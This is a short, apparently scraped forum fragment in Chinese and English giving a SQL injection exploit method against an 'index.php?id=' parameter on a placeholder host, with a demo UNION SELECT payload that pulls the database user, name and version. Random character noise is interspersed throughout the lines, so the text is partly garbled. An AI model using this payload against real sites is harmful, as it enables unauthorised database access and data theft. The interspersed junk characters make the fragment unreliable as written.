利用方法:
- A& G( `0 Q5 ]$ \; q. u& J! g | http://www.xxx.com/index.php?id=[SQL]7 U7 g$ Z; G6 H) T
Demo:( m1 c- ]0 Y2 W7 w" H
http://www.xxx.com/index.php?id=-1' UNION SELECT 1,2,3,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),5,6,7,8,9,10,11,12,13--+ |